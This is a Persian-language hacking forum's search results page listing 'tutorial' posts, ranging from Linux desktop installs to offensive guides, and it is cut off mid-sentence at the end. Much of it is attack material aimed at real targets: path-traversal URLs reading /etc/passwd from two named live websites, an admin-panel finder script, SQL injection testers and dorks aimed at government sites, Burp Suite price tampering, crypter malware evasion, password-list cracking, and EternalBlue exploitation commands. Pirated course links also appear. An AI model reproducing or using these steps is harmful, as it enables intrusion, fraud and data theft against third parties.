رفتن به مطلب



iran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'اموزش'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
  • بخش ویژه (مخصوص اعضای ویژه)
  • پروژه های تیم
  • مسابقات
  • عمومی
  • بحث آزاد علمی
  • بخش دریافت
  • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

146 نتیجه پیدا شد

  1. Doctor Robot

    Programming-Csharp اموزش 0 تا 100 c#

    سی شارپ چیست؟ سی شارپ (#C) یک زبان برنامه‌نویسی شیء گراست، که توسط شرکت مایکروسافت ساخته شده و ترکیبی از قابلیت‌های خوب ++C و JAVA است. اگر با این دو زبان آشنایی دارید، این شانس را دارید که زبان #C را راحت یاد بگیرید. این زبان به قدری راحت است که هم کسانی که قبلاً برنامه‌نویسی نکرده‌اند و هم دانش آموزان می‌توانند راحت آن را یاد بگیرند. از سی شارپ، می‌توان برای ساخت برنامه‌های تحت ویندوز، تحت وب، وب سرویس‌ها، برنامه‌های موبایل و بازی‌ها استفاده کرد. می‌توان به جای واژه ویژوال سی شارپ از کلمه سی شارپ استفاده کرد، اما ویژوال سی شارپ به معنای استفاده همزمان از سی شارپ و محیط گرافیکی ویژوال استودیو می‌باشد. این زبان برنامه‌نویسی تنها زبانی است که مخصوصاً برای دات نت فریم ورک طراحی شده است. سی شارپ از کتابخانه کلاس دات نت که شامل مجموعه بزرگی از اجزاء از قبل ساخته شده است، استفاده می‌کند. این اجزاء به ساخت هر چه سریع‌تر برنامه‌ها کمک می‌کنند. سی شارپ یک برنامه بسیار قدرتمند و شیء گرا است و با آن می‌توان برنامه‌هایی با قابلیت مدیریت بیشتر و درک آسان ایجاد کرد. ساختار این زبان نسبت به زبان‌های دیگر بسیار آسان و قابل فهم است. برای اجرای یک برنامه سی شارپ ابتدا باید دات‌نت فریم‌ورک نصب شود. سی شارپ یکی از زبان‌هایی است که از تکنولوژی‌های دیگر دات نت مانند، ASP.NET ،Silverlight و XNA پشتیبانی می‌کند. همچنین یک محیط توسعه یکپارچه دارد که آن نیز به نوبه خود دارای ابزارهای مفیدی است که به شما در کدنویسی کمک می‌کند.
  2. با سلام با اموزش نصب vscode بر روی debian ابزار vscode یک idle زیبا برای برنامه نویسان است این ابزار به صورت رایگان برای ویندوز - لینوکس - مک عرضه شده است دراین اموزش میخوام اموزش نصب کردن vscode بر روی دبیان رو برای شما دوستان انونیسک اموزش دهم . ابتدا به لینک زیر رفته و فایل را دانلود کنید : https://go.microsoft.com/fwlink/?LinkID=760868 حالا بعد از دانلود کردن فایل را به دسکتا‍‍پ پیست کنید و ترمینال را اجرا کنید : ابتدا دستور زیر را بنویسید تا به دایرکتوری دسکتاپ برود : cd Desktop حالا با تای‍پ کردن دستور زیر فایل vscode نصب خواهد شد : sudo dpkg -i vscode.deb و بعد از ان vscode نصب خواهد شد و ایکونش در دسکتاپ نمایش خواهد شد . امید وارم خوشتان امده باشد موفق و سربلند باشید سوالی بود در قسمت faq مطرح فرمایید با تشکر .
  3. با سلام به دوستان عزیز anonysec با اموزش نصب کردن میزکار gnome بر روی arch linux با شما هستم . اگر سیستم عامل شما محیط کامندی هست و گرافیکی نیست مستقیما دستور زیر را بنویسید نه اگر محیط گرافیکی دارد ترمینال را باز کنید :‌ sudo pacman -S gnome با دستور بالا gnome نصب خواهد شد اگر محیط گرافیکی استفاده میکنید هنگام ظاهر شدن صفحه لاگین لینوکستون از قسمت میزکار ها میزکار gnome را انتخواب کرده و به ان وارد شوید . باتشکر موفق و سربند باشید
  4. با سلام با اموزش نصب میزکار kde plasma بر روی ارچ لینوکس با شما هستیم . خب اگر روی ارچ لینوکستون میزکاری نیست و کامندی است میتونید تو خود اون بزنید و نه میزکاری دارد میتونید در ترمینال خود تایپ کنید ! ابتدا دستور زیر را وارد کنید :‌ sudo pacman -S plasma هنگامی که این دستوری را زدید ازتون میخواد گذینه ای را انتخواب کنید شما به صورت پیشفرض گذینه ۱ را وارد کنید تا شروع به نصب کردن میزکار شود بعد از این که نصب شد سیستم خود را با دستور reboot ریستارت کرده و از میزکار خود لذت ببرید . به نظر من این میزکار برای کاربران تازه وارد که از ویندوز به لینوکس کوچ کرده اند بهتر است !
  5. با سلام به گاربران گرامی انونیسک با اموزش نصب میزکار بر روی ارچ لینوکس با شما هسنیم , شما وقتی ارچ لینوکس را نصب کردید هیچ میزکار در اختیارتان نیست میتوانید از طریق دستورات زیر اقدام نصب میزکار نمایید و از ان استفاده کنید , در این اموزش میزکار xfce نصب خواهیم کرد و در اموزش های بعدی میزکار های دیگری هم اموزش خواهیم داد . ابتدا دستور زیرا در ارچ لینوکس خود که حالت دستوری دارد بنویسید و یا اگر حالت گرافیکی هم داشت از ترمینال استفاده کنید :‌ sudo pacman -S xfce4 خب حالا برایتان به صورت اتوماتیک میزکار نصب خواهد شد بعد از نصب شدن با دستور زیر فایل های موردنیاز میزکار را هم نصب کنید :‌ sudo pacman -S xfce4-goodies خب بعد از این کار میزکار نصب خواهد شد شما با دستور reboot سیستم خود را ریستارت کنید و با میزکار خود کیف کنید با امید موفقیت با اشکالی بود در قسمت faq بفرمایید بنده تا جایی که از دستم بربیاد جواب سوالاتونو میدم .
  6. blackpetya

    Linux اموزش نصب conky بر روی debian

    با سلام با اموزش نصب کانکی بر روی دبیان با شما هستیم . خب ابتدا ترمینال خود را باز کنید دستور زیر را تایپ کنید :‌ sudo apt-get install conky && sudo apt-get install conky-manager با دستور بالا هم کانکی منیجر و هم کانکی نصب خواهد شد ! اگر میخواهید کانکی رو بر روی ارچ نصب کنید مطلب قبلی رو نگاه کنید باتشکر . سوالی بود در قسمت faq مطرح نمایید با تشکر .
  7. با سلام با اموزش نصب کانکی بر روی لینوکس ارچ با شما هستیم . شاید برایتان سوال باشد که کانکی چه چیزی است ؟‌ کانکی افزونه ای است که مثل ویندوز به صفحه ویندوز ساعت و یا نشان دهنده گرمای سیپیو اضافه میکردیم همین کار در لینوکس هم میشود ابتدا ترمینال را در ارچ لینوکس بازکنید و بنویسید . pacman -Sy conky ابتدا گانکی رو نصب کنید و با دستور زیر گانکی منیجر رو هم نصب کنید pacman -Sy conky-manager بعد الان کانکی منیجر هم نصب شد با دستور conky-manger میتوانید کانکی منیجر رو باز کرده و کانکی هایی که نصب شده رو اضافه کنید . اگر کانکی خواصی دانلود کردید از قسمت روت لینوکستیون تنظیم کنید فایل های hide رو نشون بده و به قسمت .font فونت های کانکی خودتون رو و به .conky فایل کانکی خود را اضافه کنید . موفق و سر بلند باشید .
  8. با سلام میخوام در این بخش هم براتون میز کار Pantheon معرفی کنم خب این میزکار تقریبا میشه گفت محیطش شبیه مک هست و بنظرم خیلی زیباست و سرعتش زیاده خب میخوام به اموزش نصب این میزکار باهم بپردازیم . ابتدا مثل همیشه ترمینال را باز کنید و دستور زیرا تایپ کنید : sudo add-apt-repository ppa:elementary-os/daily با تایپ دستور بالا repository میزکار به لیست repository شما اضافه خواهد شد بعد با دستور زیر اوبونتو خود را اپدیت کنید sudo apt-get update و الان با دستور زیر اقدام نصب میزکار کنید : sudo apt install elementary-desktop خب حجم این میزکار که قبلا من دانلود کرده بودم دوره بر یک گیگ بود بعد از دانلود و نصب شدن با دستور زیر باید فایل هایی که از UI ساپورت نمیکنند رو حذف کنیم برای این کار دستور زیر میزنیم : sudo apt purge gnome-screensaver \ switchboard-plug-power switchboard-plug-bluetooth switchboard-plug-networking \ wingpanel-indicator-bluetooth wingpanel-indicator-network بعد از این که اینکار را انجام دادید با دستور زیر اقدام به اجرای میزکار نمایید . export DISPLAY=127.0.0.1:0.0; gala --x11& plank& wingpanel& با تشکر .
  9. باسلام با اموزش حمله بورت فورس به اکانت های اینستاگرام با شما هستیم این اموزش به صورت ویدیویی توسط بنده ریکورد شده است اگر مشکلی داشتید در بخش faq مطرح نمایید باتشکر لینک اموزش: http://s8.picofile.com/file/8348734842/anonysec_instagramcracking_in_kali_linux_mp4.zip.html رمز : anonysec مشکلی داشتید در خدمتم .
  10. arman

    Programming-Py اموزش نوشتن sql tester

    سلام دوستان میخوایم امروز با پایتون یک برنامه بسازیم که به ما بگه سایت باگ sql داره یا نه کد : import requests url = input("Enter Your Website : ") url = url + "%27" test = requests.get(url) test = test.text if 'You have an error in your SQL syntax' in test: print("ok") else: print("no") دوستان من خیلی خیلی مختصر و مفید نوشتم شما میتونید خیلی بهترش کنید
  11. arman

    Hacking-Bugs اموزش هک سایت باگ lfd و lfi

    سلام دوستان امروز میخوایم باهم در مورد باگ های lfd و lfi صحلت کنیم باگ lfd یعنی باگی که اجازه دانلود هر فایلی را بهتون میده و میتونید هر فایلی که دوست دارید رو دانلود کنید مثلا فایل config سایت که خیلی مهم است و یوزد و پسورد دیتابیس روی اون هستش که در سایت های جوملایی یا وردپرسی این باگ دیده میشه که به عنوان مثال پلاگین revslider در وردپرس این باگ رو داره و ما میتوانیم فایل wp-config.php را دان و سایت رو هک کنیم اگر دوست داشتید دورک گوگل و اکسپلویت را دانلود کنید به لینک زیر مراجعه نمایید. https://www.exploit-db.com/exploits/36554/ خوب برای باگ lfi مثلا مثل باگ lfd عمل میکنه فقط فرقش اینه که ما با باگ lfd میتونیم یک فایل را دانلود کنیم ولی در این باگ ما میتونیم کدهای درون فایل مورد نظر را در خود وبسایت ببینیم چند سایت نمون برای این باگ براتون میزارم https://www.arcon-cad.at/?page=index.php http://www.thesom.org/index.php?page=index.php خب برای این که ببینیم این باگ رو داره هر چی جلوی page هست رو پاک میکنیم یعنی این شکلی https://www.arcon-cad.at/?page= http://www.thesom.org/index.php?page= خب حالا ما میخوایم به فایل etc/passwd دسترسی پیدا کنیم پس این کار را انجام میدیم https://www.arcon-cad.at/?page=../../../../etc/passwd http://www.thesom.org/index.php?page=../../../../etc/passwd خب بعد از اینکار فایل etc/passwd رو به شما نشون میده و شما میتونید این سایت رو هک کنید خب آموزش به پایان رسید امیدوارم خوب بوده باشه خدا نگهدار.
  12. توضیحات کریپتر ها میتوانند از رمزنگاری های مختلفی استفاده کنند و از هر کدام از ان ها چندین بار استفاده کنند به عنوان مثال میتوان رمزنگاری های base64 , aes, … را مثال زد ; کریپتر ها اغلب به زبان های مختلفی نوشته میشوند مانند c, vb, c++ , … که نوشتن ان ها بسته به برنامه نویس دارد که نیاز به دانش و درک بالایی از برنامه نویسی و رمزنگاری دارد نکته جالب بسیاری از فروشگاه های دارک وب و حتی اینترنت crypter های خود را برای فروش میگزارند که میتوان برای مدتی از ان ها استفاده کرد مثلا برای چند ماه تا شناسایی کرد انتی ویروس ها انواع Crypter Run time این نوع از کریپتر ها در هنگام روشن بودن انی ویروس ها هم کار خود را به درستی انجام میدهند و توسط انتی ویروس شناسایی نمیشوند Scan time و در این نو کریپتر ها فقط هنگام اسکن انتی ویروس شناسایی نمیشوند و در هنگام اجرا انتی ویروس ان را شناسایی و حذف میکند نکته همیشه به دلیل رمزنگاری کردن فایل ویروس امکان بالا رفتن حجم فایل وجود دارد معرفی crypter معروف و قدرتمند بسیاری از شما بعد از ساخت رات نیاز به crypter برای اجرا و مخفی سازی از انتی ویروس های دارید یکی از معروف ترین ان ها aegiscrypte میباشد این ابزار محبوبیت بسیاری دارد و در نسخه مدت محدود و پولی که بصورت اختصاصی است ارائه میشود که میتوانید بعد از دانلود به صورت رایگان از ان استفاده کنید برای دانلود از لینک اخر صفحه بعد از ثبت نام استفاده نمایید توضیحات Aegis Crypter قابل اجرا در تمامی نسخه های ویندوز نوشته شده به زبان c ,c++ پشتیبانی از فایل های .net مباحث پیشرفته تر Crypter دوستانی که به مباحث بیشتری در این زمینه علاقه دارند میتوانند بعد از ثبت نام از لینک اخر صفحه سورس های کریپتر های مختلف را مشاهده کنند که با زبان های مختلفی وجود دارد مناسب با زبان مورد علاقه خود را دانلود کنید و از ان ها به صورت کاملا FUD استفاده کنید FUD : به معنایی شناسایی نشدن توسط هیچ انتی ویروسی و کاملا حرفه ای و قوی https://www.sendspace.com/file/iys1qn password : 123 https://github.com/malwares/Crypter
  13. سلام دوستان گرامی امروز میخوایم باهم یک برنامه که ادرس سایت را بهش میدید و صفحه لاگین را بنویسیم ببینیم import urllib import requests import os print("\n\n") print("*"*20) print("\n") print('ADMIN finder Arman Hackers') print("\n") print("*"*20) print("\n") print("\n") site = input(">>> Enter Your Site : ") # http://github.com if 'http://' in site: site = site else: site = 'http://' + site print("\n\n") print("<?> Check Url ...") print("\n") u = requests.get(site) if u.status_code == 200 : print("<+> Website ON : ",site) else: print("<-> Website Down : ",site) exit print("\n\n") patch = open('list.txt') for admin in patch: try: s = site + '/' + admin s = str(s) url = urllib.request.urlopen(s) print("<+!> Finded Admin : ",s) break except urllib.error.URLError: print("<-?> No Admin : ",s) print("\n") دوستان فایل txt که الان مینویسم در پوشه ای که برنامه هست به اسم list.txt ذخیره کنید admin1.php admin1.html admin2.php admin2.html yonetim.php yonetim.html yonetici.php yonetici.html ccms/ ccms/login.php ccms/index.php maintenance/ webmaster/ adm/ configuration/ configure/ websvn/ admin/ admin/account.php admin/account.html admin/index.php admin/index.html admin/login.php admin/login.html admin/home.php admin/controlpanel.html admin/controlpanel.php admin.php admin.html admin/cp.php admin/cp.html cp.php cp.html administrator/ administrator/index.html administrator/index.php administrator/login.html administrator/login.php administrator/account.html administrator/account.php administrator.php administrator.html login.php login.html modelsearch/login.php moderator.php moderator.html moderator/login.php moderator/login.html moderator/admin.php moderator/admin.html moderator/ account.php account.html controlpanel/ controlpanel.php controlpanel.html admincontrol.php admincontrol.html adminpanel.php adminpanel.html admin1.asp admin2.asp yonetim.asp yonetici.asp admin/account.asp admin/index.asp admin/login.asp admin/home.asp admin/controlpanel.asp admin.asp admin/cp.asp cp.asp administrator/index.asp administrator/login.asp administrator/account.asp administrator.asp login.asp modelsearch/login.asp moderator.asp moderator/login.asp moderator/admin.asp account.asp controlpanel.asp admincontrol.asp adminpanel.asp fileadmin/ fileadmin.php fileadmin.asp fileadmin.html administration/ administration.php administration.html sysadmin.php sysadmin.html phpmyadmin/ myadmin/ sysadmin.asp sysadmin/ ur-admin.asp ur-admin.php ur-admin.html ur-admin/ Server.php Server.html Server.asp Server/ wp-admin/ administr8.php administr8.html administr8/ administr8.asp webadmin/ webadmin.php webadmin.asp webadmin.html administratie/ admins/ admins.php admins.asp admins.html administrivia/ Database_Administration/ WebAdmin/ useradmin/ sysadmins/ admin1/ system-administration/ administrators/ pgadmin/ directadmin/ staradmin/ ServerAdministrator/ SysAdmin/ administer/ LiveUser_Admin/ sys-admin/ typo3/ panel/ cpanel/ cPanel/ cpanel_file/ platz_login/ rcLogin/ blogindex/ formslogin/ autologin/ support_login/ meta_login/ manuallogin/ simpleLogin/ loginflat/ utility_login/ showlogin/ memlogin/ members/ login-redirect/ sub-login/ wp-login/ login1/ dir-login/ login_db/ xlogin/ smblogin/ customer_login/ UserLogin/ login-us/ acct_login/ admin_area/ bigadmin/ project-admins/ phppgadmin/ pureadmin/ sql-admin/ radmind/ openvpnadmin/ wizmysqladmin/ vadmind/ ezsqliteadmin/ hpwebjetadmin/ newsadmin/ adminpro/ Lotus_Domino_Admin/ bbadmin/ vmailadmin/ Indy_admin/ ccp14admin/ irc-macadmin/ banneradmin/ sshadmin/ phpldapadmin/ macadmin/ administratoraccounts/ admin4_account/ admin4_colon/ radmind-1/ Super-Admin/ AdminTools/ cmsadmin/ SysAdmin2/ globes_admin/ cadmins/ phpSQLiteAdmin/ navSiteAdmin/ server_admin_small/ logo_sysadmin/ server/ database_administration/ power_user/ system_administration/ ss_vms_admin_sm/ admins mail adm party admin administration administrator administrators database admin.php admin.asp administrator.php administrator.asp administrators.asp administrators.asp login.php login.asp logon.asp logon.php quanly.asp quanly.php quantri.php quantri.asp quantriweb.asp quantriweb.asp admin_index.asp admin_index.php password.asp password.php dangnhap.asp dangnhap.php user.php user.asp خدا نگهدار
  14. با سلام با اموزش تغییر قیمت محصولات با ابزار Burp suite با شما هستیم خب ابتدا مرورگر خود را باز کنید و در قسمت پروکسی های local خود را تظیم کنید (localhost:808) قبل از این که تنظیم بکنید ادرس سایتی که قصت هک کردنشو دارید رو باز کنید و بعد پروکسی را تنظیم کنید . ابزار Burp suite با زکنید . به قسمت proxy بروید و به بخش intercept بروید و گذینه intercept را on کنید بعد به مروگر خود باز گردید و محصولی که انتخواب کرده بودید را خرید را بزنید به Burp suite برگردید با دقت به کد ها نگاه کنید و اعداد در جایی که payment نوشته و قیمت محصول را نوشته و قیمت خود را وارد کرده و روی forward کلیک کنید الان به جایی میرسه که ازتون میگه سفارش را تایید میکنید بله را بزنید و به جای قیمت محصول قیمت انتخوابی شما را کثر کند . توجه : قبلا این روش را روی یکی از سایت های خارجی تست کردن جواب مثبت گرفتم . استفاده نادرست از اموزش بر عهده خود شخص است . با تشکر
  15. اموزش PenBox توضیحات بسیاری از متخصصان امنیت و تست نفوذ علاقه ای به داشتن سیستم عامل کالی لینوکس ندارند به دلایل مختلفی مثلا سنگین بودن سیستم عامل و کند کردن سیستم , نصب بودن ابزار های بی استفاده برای شخص و محیط گرافیکی و …. اما ابزار ها نقش مهمی برای ساده کردن تست نفوذ دارند به همین دلیل ما میتوانیم ابزار های دلخواه کالی لینوکس خود را داخل سیستم خود با حجم کم داشته باشیم ابزار PenBox این امکان را میدهد که ابزار های مورد نیاز خود را به ساده ترین و کم حجم ترین روش در سیستم خود داشته باشیم بدون استفاده از سیستم عامل جداگانه عملکرد ابزار این ابزار به زبان پایتون نوشته شده است و عملکردی دارد که باعث حجم بسیار پایین ان شده استاین عملکرد به گونه ای است بعد از انتخاب هر روش تست نفوذ ان ابزار دانلود و نصب به صورت اتوماتیک میشود که با سرعت بالایی که دارد این اتفاق در سریع ترین رمان ممکن می افتد نمونه ای از این ابزار ها nmap sqlmap Setoolkit jomlascan wpscan …. نصب اموزش PenBox پایتون بر روی سیستم نصب باشد ابتدا لینک را از قسمت دانلود دریافت کنید و جایگزین link در دستور پایین کنید و دستور را وارد کنید git clone link با دستور زیر ابزار را اجرا میکنیم penbox.py/. https://github.com/x3omdax/PenBox امکانات حملات به پسورد ها تست نفوذ وایرلس ابزار های اکسپلویت ابزار های شنود وب هکینگ (تست نفوذ وب)
  16. اموزش بدست اوردن ip سایتی که از cloudflare استفاده میکند مدرس : بهروز منصوری http://uupload.ir/view/avm_4aae29daf1fa1f7d9365f560a4c75ad09293396-720p_79145.mp4/ موفق باشید
  17. باگ XXE چیست ؟ سایت های بسیاری در جهان هک میشوند و هر سایتی از روش ها و باگ های مختلفی مورد نفوذ قرار میگیرند اما در این اموزش به باگ XXE رایج در وب اپلیکیشن ها میپردازیم این باگ مخفف XML External Entity میباشد همانطور که از نامش پیداست مربوط به XML میشود در واقع امکان اجرای کد های xml را به هکر میدهد سطح دسترسی در باگ XXE سطح دسترسی میتواند برای هکر بسیار بالا باشد به دلیل ان که امکان نوشتن و خواندن کد XML دارند میتواند بعضی فایل های درون سرور را با استفاده از این باگ بخوانند و اطلاعات حساسی را از درون سرور بردارند یا حتی در مواردی هم میتوانند در سرور دستور اجرا کنند که به همین دلیل میتوان گفت xxe یکی از باگ های بسیار خطرناک و مهم است در بهترین حالت ممکن هکر درون فایل xml یک دیفیس قرار میدهد و سایت را دیفیس میکند روش های دیگری هم در شرایط مختلف میتواند وجود داشته باشد که ما به چند مورد از ان ها اشاره کرده ایم اموزش باگ یابی XXE روش های زیادی برای جستجو کردن این نوع از باگ ها وجود دارد مانند استفاده از ابزار ها و غیره اسکنر ها : بعضی از اسکنر های امنیتی برای امنیت بیشتر در وبسایت ها باگ xxe را مورد برسی در هنگام اسکن قرار میدهند هر مقدار اسکنر ها باگ ها بیشتری را شناسایی کنند و حساسیت ان ها بلاتر باشد اسکنر قدرتمند تری میشوند به طور مثال میتوانید اموزش نسوس را مشاهده کنید که یکی از اسکنر های امنیتی بسیار عالی میباشد و قابلیت اسکن باگ xxe را هم دارد اسکنر های دیگری هم هستند مانند اکانتیکس که میتوانید از ان ها هم استفاده کنید آموزش و دانلود اکانتیکس را مشاهده کنید جستجو دستی : در جستجو دستی هکر باگ را باید با تست های مکرر پیدا کند که زمان زیادی میگیرد اما دقیق تر انجام میشود نتیجه گیری اموزش باگ XXE باگ XXE یک باگ حساس امنیتی در وب اپلیکیشن ها است که از طریق ورودی هایی که امکان ارسال xml را میدهند بوجود می اید و این امکان را دارد تا کاربر کد های ان را بخواند و تغیر دهد برای پیدا کردن این باگ میتوانید به صورت دستیو یا با اسکنر ها اقدام کنید
  18. اموزش Adobe Illustrator از فرادرس قیمت 26000 https://faradars.org/courses/fvill9408-adobe-illustrator لینک های دانلود : Learn Illustrator Faradars.part2.rar - Telegram File Download Service Learn Illustrator Faradars.part1.rar - Telegram File Download Service
  19. پکیج دوره اموزش مترو در سی شارپ از لرن فایلز ?قیمت در سایت : 28,000 تومان ♻️حجم: حدود 600MB Metro In CSharp Ahwaz Hackerz.part1.rar - Telegram File Download Service Metro In CSharp Ahwaz Hackerz.part2.rar - Telegram File Download Service
  20. خب در مورد پیدا کردن سایت های اسیب پذیر صحبت میکنیم www.google.com لیست دورک سایت های پیدا کردن vuln SQLI از طریق کد کشور: inurl:*.php?id= site:RU این برای سایت های روسیه جستجو : * برای صفحات با نگاه ANYTHING.php?id= {*} با هدف قرار دادن سایت های خاص inurl:**.php?id= site:www.target.com این کمک میکند تا کاهش مدت زمان لازم براب پیدا کردن یک اسیب به جای دنبال دستی از طریق کل سایت { * } هدف بزرگ .gov inurl:**.php?id= site:uk همانطور که در بالا توضیح داده ایم برای سایت های دولت روسیه با دورک ANYTHING.php?id= فراموش نکنید که شما میتونید دورک رو تغییر دهید **.php?id= دورک مورد علاقه خود را جای ستاره قرار دهید نتیجه گیری : این کوتاه و شیرین اما بسیار مفید برای مبتدیان و کسانی که به دنبال سایت های جدید برای هک شدن هستن
  21. با سلام به کاربران عزیز تیم anonysec به علت برخی مشکلات نتوانستم پست بزارم ولی از این به بعد براتون پست های ناب میزارم ساخت پسورد لیست با ابزار passgen : ابتدا ترمینال را در کالی لینوکس باز کنید و دستور زیر را بنویسید تا ابزار دانلود شود . git clone https://github.com/Ethical-H4CK3R/PassGen بعد از این با دستور cd به دایرکتوری ابزار بروید معمولا cd /root/passgen هست بعد با دستور python passgen.py ابزار را راه اندازی کنید برای متود های ساخت پسورد لیست از شما گذینه هایی میخواهید مثلا set first_name nametarget با زدن دستور بالا نام پسورد لیست را وارد میکنیم تا از ان نام استفاده کند برای تاریخ تولد birthday و برای شهرت set last_name و برای شهر یا مکان set street_name بعد از تکمیل کردن گذینه با دستور generate میتوانید پسورد لیست را بسازید پسورد لیست در فولدر ابزار با اسم passgen.lst سیو میشه . ساخت پسورد لیست با ابزار crunch : یکی از ابزار های پر قدرت در زمینه کرکینگ و ساخت پسورد لیست ابزار crunch هست ولی یکی از مشکلات ان زیاد شدن حجم پسورد لیست است . ابتدا ترمینال را باز کنید و دستور زیر را بنویسید crunch 4 12 blackpetyaanonysec -o /root/desktop/passlist.txt خب من در کد بالا گفتم تعداد کلمات استفاده شده در پسوردلیست حداقل 4 کلمه و حد اکثر 12 کلمه جا بگیره و از متن blackpetyanonysec استفاده کنه و در مسیر دسکتاپ سیو کنه برای مثال میخواید یک کلمه ای را پرورش بدید کافیه از دستور زیر استفاده کنید crunch 4 12 #!$%^&*$ -t black@@anonysec@@ -o /root/desktop/passlist.txt هم استفاده کنید در این کد میگوییم از کد های #!$%^&* استفاده کن به جای @@ ها و سیو کن در دسکتاپ. امید وارم خوشتان امده باشد تا اموزش های بعدی خدا نگه دار
  22. اسکنر های امنیتی مختلفی را در دنیای iT مشاهده میکنیم که هر کدام از ان ها ضعف و نقاط قوتی دارند اما یکی از مهمترین مشکلات اسکنر های غیر رایگان , گران بودنشان است که بسیاری به همین دلیل یا نمیتوانند از اسکنر ها استفاده کنند یا از نسخه های کرک شده بی کیفیت استفاده میکنند اما اسکنر های رایگانی وجود دارند که بسیار خوب عمل میکنند یکی از این اسکنار های معروف و رایگان اسکنر w3af میباشد این نسخه به قدری محبوب است که در نسخه های قدیمی تر کالی لینوکس وجود داشت اما به دلایلی در نسخه های جدید وجود ندارد حال برای نصب این اسکنر کافیست به صورت دستی در هر سیستم عاملی نصب کنیم که در ادامه با نحه نصب و استفاده از ان اشنا میشویم. سیستم عامل ها قابل نصب در انواع سیستم عامل ها از جمله لینوکس ,مک و ویندوز میباشد امکانات و اموزش w3af امکان استفاده از پروکسی ارسال درخاست های HTTP کش کردن DNS UserAgent اسپوف برسی هدر های امنیتی برسی کوکی ها امکان استفاده از ابزار به دو صورت گرافیکی و کنسول امکان جستحوی باگ های حساس XSS و SQL injection اموزش نصب w3af در لینوکس از بخش دانلود لینک لینوکس را دریافت کنید و جایگزین Link در دستور زیر کنید git clone Link وارد پوشه دانلود شده شوید cd w3af حال برای اجرا برنامه به صورت گرافیکی از دستور زیر استفاده کنید ./w3af_gui درصورتی که میخواهید از محیط کنسول استفاده میکنید دستور زیر را برای اجرا وارد کنید ./w3af_console اموزش نصب w3af در ویندوز از بخش دانلود فایل exe ابزار را دریافت و اقدام به نصب کنید اموزش استفاده در محیط گرافیکی در محیط گرافیکی در قسمت مشخص شده در تصویر ادرس وبسایت مورد نظر را برای اسکن اسیب پذیری وارد کنید و از قسمت پلاگین تیک بخش های مورد نظر برای تست اسیب پذیری را بزنید در صورتی که بخشی را نیاز ندارید تیک را بردارید تا اسکن سریع تر انجام شود همچنین از قسمت profiles انواع اسیب پذیری ها و اسکن های سرور را مشاهده و مناسب با نیاز خود فعال و غیر فعال کنید و از قسمت log پروسه انجام تست اسکنر را مشاهده کنید اموزش w3af در محیط کنسول وارد بخش کنسول شوید و دستور help را وارد کنید سویچ های راهنمای اموزش w3af نشان داده میشود و برای اسکن وب سایت دستور start را وارد کنید , در تصویر زیر سویچ راهنما را مشاهده کنید دانلود ابزار w3af GitHub - andresriancho/w3af: w3af: web application attack and audit framework, the open source web vulnerability scanner. w3af download | SourceForge.net
  23. اکسپلویت نسبتا جدیدی که توسط هکر هایی از سیستم های سازمان NSA دزدیده شد این اکسپلویت با استفاده از اسیب پذیری سرویس SMB ویندوز عمل میکند و باعث اجرای کد از راه دور میشود سرویس های SMB به طور کلی در سیستم عامل فعال هستند و به همین دلیل بسیاری از سیستم های جهانی مورد خطر این اسیب پذیری قرار گرفته اند و باید حتما از اپدیت های امنیتی یا فایل پچ این اسیب پذیری استفاده نمایند چگونه میتوان از اکسپلویت Eternalblue استفاده کرد ؟ امروز که این اسیب پذیری بسیار دیده میشود ابزار هایی برای استفاده راحت از این اکسپلویت ساخته شده است و در ادامه این اموزش چندین ابزار ساده و کاربردی برای این اسیب پذیری را معرفی خواهیم کرد همچنین همراه اموزش استفاده از ان چه سیستم عامل هایی را شامل میشود ؟ Windows XP Windows 2000 Windows 2003 R2 Windows 2008 R2 Windows 2012 R2 Windows 7 SP1 Windows 8.1 Windows 2016 Windows 10 سطح دسترسی با این اکسپلویت میتوانید از راه دور شل کد خود را اجرا کنید و به صورت کامل دسترسی خود را به سیستم مورد نظر بگیرید راه رفع این اسیب پذیری بهرانی استفاده از اپدیت های امنیتی سیستم عامل میباشد همچنین میتونید فایل رف این اسیب پذیری را به صورت جدا گانه دانلود و نصب نمایید نکته از جمله میتوان برای این اسیب پذیری مشکلات بزرگی را مثال زد مانند استفاده بات نت ها و باج افزار ها برای نفوذ و باج گیری همانند باج افزار wannacry که باعث خسارت های بسیاری شد نصب یکی از راه های استفاده از اکسپلویت Eternalblue استفاده از ان در متااسپلویت میباشد که در نسخه جدید ان افزوده شده است در صورت موجود نودن در متااسپلوت متااسپلوست خود را اپدیت نمایید با استفاده از دستور زیر msfupdate اجرای اکسپلویت در متااکسپلویت اجرای متا msfconsole انتخاب اکسپلویت use address/smb/smb_ms17_010 نمایش اطلاعات ست شده options ست کردن ایپی سیستم set rhosts ip_server ست کردن پورت اکسپلویت که به صورت پیشفرض هم موجود است set rport 445 اجرا یا run exploit (همچنین میتوانید به صورت دستی فایل را به متااسپلویت خود اضافه کنید لینک در اخر صفحه میباشد.) اجرای اکسپلویت با ابزار ابزاری عالی برای استفاده از MS17-010 نوشته شده به زبان پاتون و برای سیستم عامل های مختلف دانلود ابزار با استفاده از دستور زیر git clone link چک کردن اسیب پذیر بودن سیستم مورد نظر با استفاده از ایپی سیستم python checker.py ip_server اجرای شل کد بر روی سیستم با استفاده از اکسپلویت python exploit.py ip_server shellcode دانلود کیلاگر و اموزش کیلاگر موجو به زبان فارسی معرفی ابزاری دیگر نشوته شده با زبان ruby لینک در اخر مطلب اجرا با دستور زیر ruby eternalblue_doublepulsar.rb نکته : در 